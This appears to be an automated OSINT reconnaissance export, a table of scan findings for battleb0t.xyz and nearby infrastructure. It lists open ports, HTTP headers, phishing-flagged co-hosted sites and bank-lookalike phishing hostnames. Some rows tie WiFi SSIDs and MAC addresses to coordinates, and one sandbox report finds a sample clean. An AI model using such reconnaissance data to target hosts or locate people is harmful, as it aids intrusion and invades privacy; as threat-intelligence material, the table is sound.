| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.37): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:33 | Web Server | No | Tool - WhatWeb | 0 | 0 | 2 | 0 | None | cloudflare | www.ayhu.xyz |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://fluid.battleb0t.xyz | fluid.battleb0t.xyz |
| 2023-05-12 02:45:57 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 4 | 0 | None | {u'city': u'Ashburn', u'security': {u'is_vpn': False}, u'city_geoname_id': 4744870, u'region_geoname_id': 6254928, u'country': u'United States', u'region': u'Virginia', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'AMAZON-AES', u'isp_name': u'Amazon.com, Inc.', u'organization_name': u'Amazon Technologies Inc', u'autonomous_system_number': 14618}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'20149', u'longitude': -77.4903, u'country_code': u'US', u'timezone': {u'abbreviation': u'EDT', u'gmt_offset': -4, u'is_dst': True, u'name': u'America/New_York', u'current_time': u'22:45:56'}, u'latitude': 39.0469, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2600:1f18:2489:8202::c8', u'continent': u'North America', u'region_iso_code': u'VA'} | 2600:1f18:2489:8202::c8 |
| 2023-05-12 03:08:48 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.230 | 104.196.30.220 |
| 2023-05-12 03:32:08 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.5:8080 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:74:99:A4:64) | 41.8781, -87.6298 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Apple Network 3ac606 (Net ID: 00:02:2D:21:9A:18) | 34.0544, -118.244 |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:2083 | 104.21.6.166 |
| 2023-05-12 03:00:51 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000000014286.github.io | 185.199.111.153 |
| 2023-05-12 03:03:47 | Co-Hosted Site | No | ThreatMiner | 1 | 0 | 2 | 0 | None | scoop.sh | 185.199.111.153 |
| 2023-05-12 03:01:03 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.108): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | HubPages (Category: blog)<br>https://hubpages.com/@login | login |
| 2023-05-12 02:53:07 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.111.154:443 | 185.199.111.0/24 |
| 2023-05-12 02:53:59 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://kurt-defreitas.github.io/img/placeholder.svg', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_9f8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_9f8_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "IsoScope_9f8_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_9f8_ConnHashTable<2552>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_9f8_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2552"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_9f8_IE_EarlyTabStart_0xb00_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"'}, {u'category': 
u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"kurt-defreitas.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "en-US.5" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.5]- [targetUID: 00000000-00002552]\n "~DF132D18D7697B1B40.TMP" has type "data"- Location: [%TEMP%\\~DF132D18D7697B1B40.TMP]- [targetUID: 00000000-00002552]\n "~DFF703004D4AAD5F49.TMP" has type "data"- Location: [%TEMP%\\~DFF703004D4AAD5F49.TMP]- [targetUID: 00000000-00002552]\n "~DF13EE8B4FF73D23D0.TMP" has type "data"- Location: [%TEMP%\\~DF13EE8B4FF73D23D0.TMP]- [targetUID: 00000000-00002552]\n "~DF4D594C562EE2D021.TMP" has type "data"- Location: [%TEMP%\\~DF4D594C562EE2D021.TMP]- [targetUID: 00000000-00002552]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._AA626797-D3A5-11ED-8072-080027477A00_.dat" has type "Composite 
Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_B2115BA0-D3A5-11ED-8072-080027477A00_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_AA626799-D3A5-11ED-8072-080027477A00_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "LHKBGYS9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LHKBGYS9.txt]- [targetUID: 00000000-00003016]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "VP6RUECO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\VP6RUECO.txt]- [targetUID: 00000000-00002552]\n "5CPGZ5IA.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5CPGZ5IA.txt]- [targetUID: 00000000-00002552]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://kurt-defreitas.github.io/img/placeholder.svg"\n Pattern match: "https://kurt-defreitas.github.io"\n Pattern match: "isdomainmigratedtruewww.msn.com/102573378790431061301290557634631025074*"\n Pattern match: "www.msn.com/"\n Pattern match: "MUIDB3901E857A0CA662738CBFA56A18667BBieonline.microsoft.com/9216413533568031103545290260759631025074*"\n Pattern match: "MUID3901E857A0CA662738CBFA56A18667BBmicrosoft.com/1025411295705631056689247978600330978218*SRCHDAF=NOFORMmicrosoft.com/1024194638604831125287247978600330978218*SRCHUIDV=2&GUID=A9F735962E2A42C3AFD3CAEB5B5F826B&dmnchg=1microsoft.com/1024194638604831125287247"\n Heuristic match: "kurt-defreitas.github.io"\n 
Pattern match: "kurt-defreitas.github.io/img/placeholder.svg"\n Heuristic match: "urt-defreitas.github.io"\n Pattern match: "https://kurt-defreit"\n Pattern match: "thub.io/img/placeholder.svg"\n Heuristic match: ".VBE;.JS;.JSE;.WSF;.WSH;.MS"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.rundll32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\system32\\rundll32.exe"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.InetCore.ieframe,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\system32\\IEFRAME.dll"\n Potential IP "5.1.0.0" found in string "version="5.1.0.0""'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/88 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'642d780eb081708a1d0cd972', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 3, u'suspicious_identifiers_count': 
0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'185.199.109.153'], u'sha256': u'd84ad76dbc17dc4539d49469071a2427b7e79fdc246d68b969e9de0d1e855535', u'sha512': u'b3210c962393967f3e6fe80ee046138402e981859fad47091c2a0e01dcac772aa503fd055cb12c62fbab75f63ef3b92e9749e878914ba9e90fc11586407c6113', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://kurt-defreitas.github.io/img/placeholder.svg', u'submission_id': u'642d780eb081708a1d0cd973', u'created_at': u'2023-04-05T13:30:54+00:00', u'filename': None}], u'analysis_start_time': u'2023-04-05T13:30:54+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'd1ce50a9c575b4cf671aba5ee730067f', u'network_mode': u'default', u'processes': [], u'sha1': u'c3d81748524ef71e72b65a4a2266ceede7285d7d', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 64 bit', 
u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [u'kurt-defreitas.github.io'], u'extracted_files': [], u'type_short': []}] | 185.199.109.153 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.180): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:38 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden<br>Date: <REDACTED><br>Content-Type: text/html; charset=UTF-8<br>Transfer-Encoding: chunked<br>Connection: close<br>X-Frame-Options: SAMEORIGIN<br>Referrer-Policy: same-origin<br>Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br>Expires: Thu, 01 Jan 1970 00:00:01 GMT<br>Vary: Accept-Encoding<br>Server: cloudflare<br>CF-RAY: 7c5ad421cd00112e-ORD<br>Content-Encoding: gzip | 172.67.168.252 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 410HowardStudios (Net ID: 00:02:2D:00:25:63) | 37.7813933,-122.3918002 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | hackster (Category: coding)<br>https://www.hackster.io/login | login |
| 2023-05-12 03:09:27 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | cdnjs.cloudflare.com | 188.114.97.1 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | nocwap (Net ID: 00:04:5A:CC:3F:27) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | x-proxy-cache: MISS | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-ewr18140-EWR", "x-cache": "HIT", "x-github-request-id": "1AD4:4FA0:AFAB37:106D10A:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "47e9025f17d9e6e936d804b3c00d7989ec4a827a", "date": "Fri, 12 May 2023 02:54:12 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "559", "x-timer": "S1683860053.987504,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.80): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [001wwang.github.io]<br>https://www.openphish.com/feed.txt | 001wwang.github.io |
| 2023-05-12 03:00:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | aes256-gcm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", 
"mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], 
"server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", 
"vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-51D2 (Net ID: 00:1D:D1:0A:51:D0) | 32.8608, -79.9746 |
| 2023-05-12 02:53:42 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.109.153:443 | 185.199.109.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:02:2D:03:B4:A0) | 37.7642, -122.3993 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | pgi50 (Net ID: 00:01:21:10:7A:20) | 37.7813933,-122.3918002 |
| 2023-05-12 02:46:34 | Internet Name | No | VirusTotal | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz | www.battleb0t.xyz |
| 2023-05-12 02:54:44 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["0"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "X_Nf_Request_Id": ["01H06KNWSV7RTZ7MSA7BNCK843"], "Date": ["<REDACTED>"], "Server": ["Netlify"]} | 35.229.48.116 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATT9wHk9D5 (Net ID: D4:B2:7A:4E:26:D2) | 37.751, -97.822 |
| 2023-05-12 03:27:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.138:8443 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F4:F3:43) | 41.8781, -87.6298 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | kristin (Net ID: 00:0C:41:84:68:1E) | 39.0469, -77.4903 |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:2053 | 172.67.168.252 |
| 2023-05-12 03:03:36 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00steveng.github.io |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.179): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 54d382 (Net ID: F4:6B:EF:54:D3:86) | 37.751, -97.822 |
| 2023-05-12 03:22:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 188.114.97.1:443 | 188.114.97.1 |
| 2023-05-12 03:16:12 | Similar Domain | Yes | Tool - DNSTwist | 0 | 0 | 1 | 0 | None | battlebot.xyz | battleb0t.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:13:10 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [01100111-01101001-01110100.github.io]<br>https://www.openphish.com/feed.txt | 01100111-01101001-01110100.github.io |
